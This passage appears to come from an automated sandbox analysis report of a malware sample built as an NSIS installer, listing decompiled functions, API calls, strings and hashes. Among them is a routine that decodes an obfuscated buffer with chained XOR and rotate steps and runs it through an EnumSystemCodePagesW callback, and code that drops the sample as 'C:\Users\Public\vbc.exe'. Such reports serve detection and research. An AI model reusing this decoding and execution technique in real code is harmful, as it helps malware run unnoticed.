                                                0x0040697c
                                                0x0040697f
                                                0x00406982
                                                0x00406985
                                                0x00406989
                                                0x0040698b
                                                0x0040698b
                                                0x0040698c
                                                0x0040698f
                                                0x00406965
                                                0x00406965
                                                0x0040696d
                                                0x00406972
                                                0x00406974
                                                0x00406977
                                                0x00406977
                                                0x00406992
                                                0x00406999
                                                0x00000000
                                                0x0040699b
                                                0x00000000
                                                0x0040699b
                                                0x00000000
                                                0x00406637
                                                0x0040663a
                                                0x00406670
                                                0x004067a0
                                                0x004067a0
                                                0x004067a0
                                                0x004067a0
                                                0x004067a3
                                                0x004067a3
                                                0x004067a6
                                                0x004067a8
                                                0x00406a32
                                                0x00000000
                                                0x00406a32
                                                0x004067ae
                                                0x004067b1
                                                0x00000000
                                                0x00000000
                                                0x004067b7
                                                0x004067bb
                                                0x004067be
                                                0x004067be
                                                0x004067be
                                                0x00000000
                                                0x004067be
                                                0x0040663c
                                                0x0040663e
                                                0x00406640
                                                0x00406642
                                                0x00406645
                                                0x00406646
                                                0x00406648
                                                0x0040664a
                                                0x0040664d
                                                0x00406650
                                                0x00406666
                                                0x0040666b
                                                0x004066a3
                                                0x004066a3
                                                0x004066a7
                                                0x004066d3
                                                0x004066d5
                                                0x004066dc
                                                0x004066df
                                                0x004066e2
                                                0x004066e2
                                                0x004066e7
                                                0x004066e7
                                                0x004066e9
                                                0x004066ec
                                                0x004066f3
                                                0x004066f6
                                                0x00406723
                                                0x00406723
                                                0x00406726
                                                0x00406729
                                                0x0040679d
                                                0x0040679d
                                                0x0040679d
                                                0x00000000
                                                0x0040679d
                                                0x0040672b
                                                0x00406731
                                                0x00406734
                                                0x00406737
                                                0x0040673a
                                                0x0040673d
                                                0x00406740
                                                0x00406743
                                                0x00406746
                                                0x00406749
                                                0x0040674c
                                                0x00406765
                                                0x00406767
                                                0x0040676a
                                                0x0040676b
                                                0x0040676e
                                                0x00406770
                                                0x00406773
                                                0x00406775
                                                0x00406777
                                                0x0040677a
                                                0x0040677c
                                                0x0040677f
                                                0x00406783
                                                0x00406785
                                                0x00406785
                                                0x00406786
                                                0x00406789
                                                0x0040678c
                                                0x0040674e
                                                0x0040674e
                                                0x00406756
                                                0x0040675b
                                                0x0040675d
                                                0x00406760
                                                0x00406760
                                                0x0040678f
                                                0x00406796
                                                0x00406720
                                                0x00406720
                                                0x00406720
                                                0x00406720
                                                0x00000000
                                                0x00406798
                                                0x00000000
                                                0x00406798
                                                0x00406796
                                                0x004066a9
                                                0x004066ac
                                                0x004066ae
                                                0x004066b1
                                                0x004066b4
                                                0x004066b7
                                                0x004066b9
                                                0x004066bc
                                                0x004066bf
                                                0x004066bf
                                                0x004066c2
                                                0x004066c2
                                                0x004066c5
                                                0x004066cc
                                                0x004066a0
                                                0x004066a0
                                                0x004066a0
                                                0x004066a0
                                                0x00000000
                                                0x004066ce
                                                0x00000000
                                                0x004066ce
                                                0x004066cc
                                                0x00406652
                                                0x00406655
                                                0x00406657
                                                0x0040665a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406544
                                                0x00406544
                                                0x00406548
                                                0x00406a0e
                                                0x00000000
                                                0x00406a0e
                                                0x0040654e
                                                0x00406551
                                                0x00406554
                                                0x00406557
                                                0x00406559
                                                0x00406559
                                                0x00406559
                                                0x0040655c
                                                0x0040655f
                                                0x00406562
                                                0x00406565
                                                0x00406568
                                                0x0040656b
                                                0x0040656c
                                                0x0040656e
                                                0x0040656e
                                                0x0040656e
                                                0x00406571
                                                0x00406574
                                                0x00406577
                                                0x0040657a
                                                0x0040657a
                                                0x0040657a
                                                0x0040657d
                                                0x00000000
                                                0x00000000
                                                0x004067c1
                                                0x004067c1
                                                0x004067c1
                                                0x004067c5
                                                0x00000000
                                                0x00000000
                                                0x004067cb
                                                0x004067ce
                                                0x004067d1
                                                0x004067d4
                                                0x004067d6
                                                0x004067d6
                                                0x004067d6
                                                0x004067d9
                                                0x004067dc
                                                0x004067df
                                                0x004067e2
                                                0x004067e5
                                                0x004067e8
                                                0x004067e9
                                                0x004067eb
                                                0x004067eb
                                                0x004067eb
                                                0x004067ee
                                                0x004067f1
                                                0x004067f4
                                                0x004067f7
                                                0x004067fa
                                                0x004067fe
                                                0x00406800
                                                0x00406803
                                                0x00000000
                                                0x00406805
                                                0x00000000
                                                0x00406805
                                                0x00406803
                                                0x00406a38
                                                0x00000000
                                                0x00000000
                                                0x00406067

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1a16ca79695306fc73f85128c7aced9bd30f9fee4c2e10d2154f2b02c59f7427
                                                • Instruction ID: bc715f9ab80968e75e2fbed037c5f1c5951903de2449374fee89636cff417fa3
                                                • Opcode Fuzzy Hash: 1a16ca79695306fc73f85128c7aced9bd30f9fee4c2e10d2154f2b02c59f7427
                                                • Instruction Fuzzy Hash: 52F18571D00229CBCF28DFA8C8946ADBBB1FF45305F25816ED856BB281D3785A96CF44
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 10003D10, Relevance: 4.7, APIs: 3, Instructions: 232COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 16%
                                                			E10003D10(void* __edx, void* __eflags) {
				signed int _v20;
				signed int _v24;
				signed int _v25;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				void* __ebx;
				void* __edi;
				intOrPtr _t120;
				void* _t131;
				void* _t214;
				intOrPtr* _t283;

				_v20 = 0;
				 *_t283 = 0xbebc200; // executed
				_t120 = E1000591F(_t131, __edx, _t214); // executed
				_v20 = _t120;
				if(_v20 != 0) {
					 *_t283 = _v20;
					_v40 = 0xde;
					_v36 = 0xbebc200;
					E10007DD0();
					_v24 = 0;
					_v24 = 0;
					while(_v24 < 0x1463) {
						_v25 =  *((intOrPtr*)(_v24 +  &E1001A000));
						_v25 = _v25 & 0x000000ff ^ 0xffffffff;
						_v25 = (_v25 & 0x000000ff) + 0x74;
						_v25 = _v25 & 0x000000ff ^ 0xffffffff;
						_v25 = 0 - (_v25 & 0x000000ff);
						_v25 = (_v25 & 0x000000ff) + _v24;
						_v25 = (_v25 & 0x000000ff) >> 0x00000002 | (_v25 & 0x000000ff) << 0x00000006;
						_v25 = (_v25 & 0x000000ff) + _v24;
						_v25 = _v25 & 0x000000ff ^ 0x000000e3;
						_v25 = (_v25 & 0x000000ff) + _v24;
						_v25 = _v25 & 0x000000ff ^ 0x000000a2;
						_v25 = (_v25 & 0x000000ff) - _v24;
						_v25 = _v25 & 0x000000ff ^ _v24;
						_v25 = 0 - (_v25 & 0x000000ff);
						_v25 = (_v25 & 0x000000ff) - _v24;
						_v25 = _v25 & 0x000000ff ^ 0x00000080;
						_v25 = (_v25 & 0x000000ff) - _v24;
						_v25 = (_v25 & 0x000000ff) >> 0x00000003 | (_v25 & 0x000000ff) << 0x00000005;
						_v25 = (_v25 & 0x000000ff) - 0xdb;
						_v25 = _v25 & 0x000000ff ^ _v24;
						_v25 = (_v25 & 0x000000ff) - 0xe9;
						_v25 = _v25 & 0x000000ff ^ _v24;
						_v25 = (_v25 & 0x000000ff) + 0xfb;
						_v25 = _v25 & 0x000000ff ^ 0x000000ab;
						_v25 = _v25 & 0x000000ff ^ 0xffffffff;
						_v25 = (_v25 & 0x000000ff) - 0x56;
						_v25 = _v25 & 0x000000ff ^ 0xffffffff;
						_v25 = 0 - (_v25 & 0x000000ff);
						_v25 = _v25 & 0x000000ff ^ _v24;
						_v25 = (_v25 & 0x000000ff) >> 0x00000003 | (_v25 & 0x000000ff) << 0x00000005;
						_v25 = _v25 & 0x000000ff ^ _v24;
						_v25 = (_v25 & 0x000000ff) - _v24;
						_v25 = 0 - (_v25 & 0x000000ff);
						_v25 = (_v25 & 0x000000ff) >> 0x00000003 | (_v25 & 0x000000ff) << 0x00000005;
						_v25 = (_v25 & 0x000000ff) + _v24;
						_v25 = _v25 & 0x000000ff ^ 0x0000005a;
						_v25 = (_v25 & 0x000000ff) - _v24;
						_v25 = _v25 & 0x000000ff ^ _v24;
						_v25 = _v25 & 0x000000ff ^ 0xffffffff;
						_v25 = _v25 & 0x000000ff ^ _v24;
						_v25 = 0 - (_v25 & 0x000000ff);
						 *((char*)(_v24 +  &E1001A000)) = _v25;
						_v24 = _v24 + 1;
					}
					 *_t283 =  &E1001A000;
					_v40 = 0;
					_v32 = 0;
					EnumSystemCodePagesW(??, ??); // executed
				}
				return 0;
			}















                                                0x10003d19
                                                0x10003d20
                                                0x10003d27
                                                0x10003d2c
                                                0x10003d33
                                                0x10003d3c
                                                0x10003d3f
                                                0x10003d47
                                                0x10003d4f
                                                0x10003d54
                                                0x10003d5b
                                                0x10003d62
                                                0x10003d7b
                                                0x10003d85
                                                0x10003d91
                                                0x10003d9d
                                                0x10003da8
                                                0x10003db6
                                                0x10003dcb
                                                0x10003dd9
                                                0x10003de8
                                                0x10003df6
                                                0x10003e05
                                                0x10003e13
                                                0x10003e21
                                                0x10003e2c
                                                0x10003e3a
                                                0x10003e49
                                                0x10003e57
                                                0x10003e6c
                                                0x10003e7b
                                                0x10003e89
                                                0x10003e98
                                                0x10003ea6
                                                0x10003eb5
                                                0x10003ec4
                                                0x10003ed0
                                                0x10003edc
                                                0x10003ee8
                                                0x10003ef3
                                                0x10003f01
                                                0x10003f16
                                                0x10003f24
                                                0x10003f32
                                                0x10003f3d
                                                0x10003f52
                                                0x10003f60
                                                0x10003f6c
                                                0x10003f7a
                                                0x10003f88
                                                0x10003f94
                                                0x10003fa2
                                                0x10003fab
                                                0x10003fb4
                                                0x10003fc1
                                                0x10003fc1
                                                0x10003fd1
                                                0x10003fd4
                                                0x10003fdc
                                                0x10003fdf
                                                0x10003fe5
                                                0x10003ff1

                                                APIs
                                                • _malloc.LIBCMT ref: 10003D27
                                                  • Part of subcall function 1000591F: __FF_MSGBANNER.LIBCMT ref: 10005936
                                                  • Part of subcall function 1000591F: __NMSG_WRITE.LIBCMT ref: 1000593D
                                                  • Part of subcall function 1000591F: RtlAllocateHeap.NTDLL(005A0000,00000000,00000001,?,?,?,?,10003D2C), ref: 10005962
                                                • _memset.LIBCMT ref: 10003D4F
                                                • EnumSystemCodePagesW.KERNELBASE ref: 10003FDF
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.497246318.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000004.00000002.497232899.0000000010000000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497307012.0000000010014000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497331845.000000001001A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497358884.000000001001F000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: AllocateCodeEnumHeapPagesSystem_malloc_memset
                                                • String ID:
                                                • API String ID: 2588709530-0
                                                • Opcode ID: a51a0219c573a77e62c53325f2c3942d8920776161f81abfc2d34c45419a42bb
                                                • Instruction ID: 6c52bdc4f57217dffc4c5858f8f7a604b9f4772a349881732ef4e96e2d482f86
                                                • Opcode Fuzzy Hash: a51a0219c573a77e62c53325f2c3942d8920776161f81abfc2d34c45419a42bb
                                                • Instruction Fuzzy Hash: CDA1D856E191EA4ACF068ABD50629FFBEF35F96191F0E058EDCD273382C5A01904D7B2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405E93, Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00405E93(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x422588); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x422588;
			}




                                                0x00405e9e
                                                0x00405ea7
                                                0x00000000
                                                0x00405eb4
                                                0x00405eaa
                                                0x00000000

                                                APIs
                                                • FindFirstFileA.KERNELBASE(?,00422588,00421940,004057AF,00421940,00421940,00000000,00421940,00421940,?,?,?,004054D1,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405E9E
                                                • FindClose.KERNEL32(00000000), ref: 00405EAA
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Find$CloseFileFirst
                                                • String ID:
                                                • API String ID: 2295610775-0
                                                • Opcode ID: 8f5741f541142194311058383cb09f480250e6c9d027ffd32cd20bf8f0009166
                                                • Instruction ID: 22d16aeb20e1d117df59da4f29a20059377f8c00669f4036672bdba2b414caf9
                                                • Opcode Fuzzy Hash: 8f5741f541142194311058383cb09f480250e6c9d027ffd32cd20bf8f0009166
                                                • Instruction Fuzzy Hash: 95D0123190D520ABD7015738BD0C84B7A59DB553323508F32B465F53E0C7788D928AEA
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004035EB, Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 96%
                                                			E004035EB(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				signed int _t24;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				int _t37;
				int _t38;
				intOrPtr _t39;
				int _t42;
				intOrPtr _t60;
				char _t62;
				CHAR* _t64;
				signed char _t68;
				struct HINSTANCE__* _t76;
				CHAR* _t79;
				intOrPtr _t81;
				CHAR* _t85;

				_t81 =  *0x423f50; // 0x601fd8
				_t20 = E00405F28(3);
				_t88 = _t20;
				if(_t20 == 0) {
					_t79 = 0x420538;
					"1033" = 0x7830;
					E00405A7F(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420538, 0);
					__eflags =  *0x420538;
					if(__eflags == 0) {
						E00405A7F(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407342, 0x420538, 0);
					}
					lstrcatA("1033", _t79);
				} else {
					E00405AF6("1033",  *_t20() & 0x0000ffff);
				}
				E004038B4(_t76, _t88);
				_t24 =  *0x423f58; // 0x80
				_t84 = "C:\\Users\\Albus\\AppData\\Local\\Temp";
				 *0x423fc0 = _t24 & 0x00000020;
				 *0x423fdc = 0x10000;
				if(E0040576C(_t88, "C:\\Users\\Albus\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E0040576C(_t96, _t84) == 0) {
						E00405BBA(0, _t79, _t81, _t84,  *((intOrPtr*)(_t81 + 0x118)));
					}
					_t28 = LoadImageA( *0x423f40, 0x67, 1, 0, 0, 0x8040);
					 *0x423728 = _t28;
					if( *((intOrPtr*)(_t81 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E004038B4(_t76, __eflags);
							__eflags =  *0x423fe0; // 0x0
							if(__eflags != 0) {
								_t31 = E00404F56(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42370c; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x420510, 5); // executed
							_t37 = E00405EBA("RichEd20"); // executed
							__eflags = _t37;
							if(_t37 == 0) {
								E00405EBA("RichEd32");
							}
							_t85 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t85, 0x4236e0);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x4236e0);
								 *0x423704 = _t85;
								RegisterClassA(0x4236e0);
							}
							_t39 =  *0x423720; // 0x0
							_t42 = DialogBoxParamA( *0x423f40, _t39 + 0x00000069 & 0x0000ffff, 0, E00403981, 0); // executed
							E0040353B(E0040140B(5), 1);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t76 =  *0x423f40; // 0x400000
						 *0x4236f4 = _t28;
						_v20 = 0x624e5f;
						 *0x4236e4 = E00401000;
						 *0x4236f0 = _t76;
						 *0x423704 =  &_v20;
						if(RegisterClassA(0x4236e0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x420510 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423f40, 0);
						goto L21;
					}
				} else {
					_t76 =  *(_t81 + 0x48);
					if(_t76 == 0) {
						goto L16;
					}
					_t60 =  *0x423f78; // 0x607158
					_t79 = 0x422ee0;
					E00405A7F( *((intOrPtr*)(_t81 + 0x44)), _t76,  *((intOrPtr*)(_t81 + 0x4c)) + _t60, 0x422ee0, 0);
					_t62 =  *0x422ee0; // 0x70
					if(_t62 == 0) {
						goto L16;
					}
					if(_t62 == 0x22) {
						_t79 = 0x422ee1;
						 *((char*)(E004056B6(0x422ee1, 0x22))) = 0;
					}
					_t64 = lstrlenA(_t79) + _t79 - 4;
					if(_t64 <= _t79 || lstrcmpiA(_t64, ?str?) != 0) {
						L15:
						E00405B98(_t84, E0040568B(_t79));
						goto L16;
					} else {
						_t68 = GetFileAttributesA(_t79);
						if(_t68 == 0xffffffff) {
							L14:
							E004056D2(_t79);
							goto L15;
						}
						_t96 = _t68 & 0x00000010;
						if((_t68 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}





























                                                0x004035f1
                                                0x004035fa
                                                0x00403601
                                                0x00403603
                                                0x00403617
                                                0x00403629
                                                0x00403633
                                                0x00403638
                                                0x0040363e
                                                0x00403651
                                                0x00403651
                                                0x0040365c
                                                0x00403605
                                                0x00403610
                                                0x00403610
                                                0x00403661
                                                0x00403666
                                                0x0040366b
                                                0x00403674
                                                0x00403679
                                                0x0040368a
                                                0x00403711
                                                0x00403719
                                                0x00403722
                                                0x00403722
                                                0x00403738
                                                0x0040373e
                                                0x0040374c
                                                0x004037db
                                                0x004037e3
                                                0x004037ed
                                                0x004037f2
                                                0x004037f8
                                                0x00403882
                                                0x00403887
                                                0x00403889
                                                0x004038a5
                                                0x00000000
                                                0x004038a5
                                                0x0040388b
                                                0x00403891
                                                0x00403899
                                                0x00403899
                                                0x00000000
                                                0x00403891
                                                0x00403806
                                                0x00403811
                                                0x00403816
                                                0x00403818
                                                0x0040381f
                                                0x0040381f
                                                0x0040382a
                                                0x00403832
                                                0x00403834
                                                0x00403836
                                                0x0040383f
                                                0x00403842
                                                0x00403848
                                                0x00403848
                                                0x0040384e
                                                0x00403867
                                                0x00403878
                                                0x00000000
                                                0x0040387d
                                                0x004037e5
                                                0x004037e7
                                                0x00000000
                                                0x00403752
                                                0x00403752
                                                0x00403758
                                                0x00403762
                                                0x0040376a
                                                0x00403774
                                                0x0040377a
                                                0x00403788
                                                0x004038aa
                                                0x004038aa
                                                0x00000000
                                                0x004038aa
                                                0x0040378e
                                                0x00403797
                                                0x004037d6
                                                0x00000000
                                                0x004037d6
                                                0x00403690
                                                0x00403690
                                                0x00403695
                                                0x00000000
                                                0x00000000
                                                0x0040369a
                                                0x0040369f
                                                0x004036af
                                                0x004036b4
                                                0x004036bb
                                                0x00000000
                                                0x00000000
                                                0x004036bf
                                                0x004036c1
                                                0x004036ce
                                                0x004036ce
                                                0x004036d6
                                                0x004036dc
                                                0x00403704
                                                0x0040370c
                                                0x00000000
                                                0x004036ee
                                                0x004036ef
                                                0x004036f8
                                                0x004036fe
                                                0x004036ff
                                                0x00000000
                                                0x004036ff
                                                0x004036fa
                                                0x004036fc
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004036fc
                                                0x004036dc

                                                APIs
                                                  • Part of subcall function 00405F28: GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                                                  • Part of subcall function 00405F28: GetProcAddress.KERNEL32(00000000,?,?,?,00403165,0000000D), ref: 00405F55
                                                • lstrcatA.KERNEL32(1033,00420538,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420538,00000000,00000003,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\Public\vbc.exe" ,00000000), ref: 0040365C
                                                • lstrlenA.KERNEL32(pnzipglt,?,?,?,pnzipglt,00000000,C:\Users\user\AppData\Local\Temp,1033,00420538,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420538,00000000,00000003,C:\Users\user\AppData\Local\Temp\), ref: 004036D1
                                                • lstrcmpiA.KERNEL32(?,.exe,pnzipglt,?,?,?,pnzipglt,00000000,C:\Users\user\AppData\Local\Temp,1033,00420538,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420538,00000000), ref: 004036E4
                                                • GetFileAttributesA.KERNEL32(pnzipglt), ref: 004036EF
                                                • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp), ref: 00403738
                                                  • Part of subcall function 00405AF6: wsprintfA.USER32 ref: 00405B03
                                                • RegisterClassA.USER32 ref: 0040377F
                                                • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 00403797
                                                • CreateWindowExA.USER32 ref: 004037D0
                                                • ShowWindow.USER32(00000005,00000000), ref: 00403806
                                                • GetClassInfoA.USER32(00000000,RichEdit20A,004236E0), ref: 00403832
                                                • GetClassInfoA.USER32(00000000,RichEdit,004236E0), ref: 0040383F
                                                • RegisterClassA.USER32(004236E0), ref: 00403848
                                                • DialogBoxParamA.USER32 ref: 00403867
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: "C:\Users\Public\vbc.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$pnzipglt$6B
                                                • API String ID: 1975747703-1529311827
                                                • Opcode ID: 6d9bdf85a822e0f9bb9c4e2fcc7d2e939be480c33988b3e2c2e3dba5f36146f3
                                                • Instruction ID: 6624008b3449f808402c67b3262d240ca0850aee1e0dcbc9c28568ef27b6b269
                                                • Opcode Fuzzy Hash: 6d9bdf85a822e0f9bb9c4e2fcc7d2e939be480c33988b3e2c2e3dba5f36146f3
                                                • Instruction Fuzzy Hash: 6A61E9B17002047EE620AF619D45E3B7ABCEB4474AF40457FF941B22E2D77D9E428A2D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00402C55, Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 182COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 80%
                                                			E00402C55(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t53;
				signed int _t54;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t67;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = "C:\\Users\\Public\\vbc.exe";
				 *0x423f4c = _t43 + 0x3e8; // executed
				GetModuleFileNameA(0, "C:\\Users\\Public\\vbc.exe", 0x400); // executed
				_t89 = E0040586F(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x409014 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				_t92 = "C:\\Users\\Public";
				E00405B98("C:\\Users\\Public", _t91);
				E00405B98(0x42c000, E004056D2(_t92));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x41f0e8 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402BF1(1);
					__eflags =  *0x423f54 - _t82; // 0x8200
					if(__eflags == 0) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						_t54 =  *0x423f54; // 0x8200
						E004030B3(_t54 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E00402E8E(); // executed
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x423f50 = _t94;
							 *0x423f58 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x423f5c =  *0x423f5c + 1;
								__eflags =  *0x423f5c;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405830(0x423f60, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E004030B3( *0x40b0d8);
					_t65 = E00403081( &_a4, 4);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t67 =  *0x423f54; // 0x8200
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~_t67 & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E00403081(0x4170e8, _t90); // executed
						__eflags = _t71;
						if(_t71 == 0) {
							E00402BF1(1);
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x423f54;
						if( *0x423f54 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402BF1(0);
							}
							goto L20;
						}
						E00405830( &_v44, 0x4170e8, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x40b0d8; // 0x8200
						 *0x423fe0 =  *0x423fe0 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x423f54 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t93 = _t80 - 4;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x41f0e8;
						if(_t93 <  *0x41f0e8) {
							_v12 = E00405F97(_v12, 0x4170e8, _t90);
						}
						 *0x40b0d8 =  *0x40b0d8 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 > 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}

































                                                0x00402c5d
                                                0x00402c60
                                                0x00402c63
                                                0x00402c66
                                                0x00402c6c
                                                0x00402c7d
                                                0x00402c82
